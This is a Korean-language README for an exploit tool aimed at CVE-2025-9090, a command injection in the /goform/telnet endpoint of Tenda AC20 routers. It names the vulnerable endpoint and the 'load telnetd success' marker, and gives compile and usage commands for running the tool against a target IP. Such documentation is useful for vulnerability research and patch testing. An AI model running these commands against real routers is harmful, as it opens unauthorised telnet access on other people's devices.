
Tenda AC20 16.03.08.12 (/goform/telnet)에서의 명령어 주입 취약점
저자: Byte Reaper
이 익스플로잇은 Tenda AC20 (v16.03.08.12) 라우터의 명령어 삽입 취약점인 CVE-2025-9090을 대상으로 합니다.
이 결함은 엔드포인트 /goform/telnet에 있으며, 원격으로 트리거될 수 있습니다.
접근 시 장치에서 텔넷 서비스가 시작되어 원격 상호 작용을 위해 23/2323 포트가 열립니다.
이 프로그램은 취약한 엔드포인트에 요청을 보내고 응답 문자열 **"load telnetd success"**를 찾은 다음, 텔넷 서비스에 연결하여 익스플로잇 성공 여부를 확인합니다.
gcc를 사용하여 컴파일:
gcc exploit.c argparse.c -o CVE-2025-9090 -lcurl
-h, --help 도움말 메시지를 표시하고 종료합니다.
-i, --ip 대상 IP 입력
-c, --cookies 쿠키 파일 입력
-v, --verbose 상세 모드
-f, --loop= 요청 횟수
./CVE-2025-9090 -i <IP>
- 상세 모드 :
./CVE-2025-9090 -i <IP> -v
- 요청 횟수 :
./CVE-2025-9090 -i <IP> -v -f 5 (5 POST 엔드포인트)
- 쿠키 파일 :
./CVE-2025-9090 -i <IP> -v -f 5 -c [파일 이름]
MIT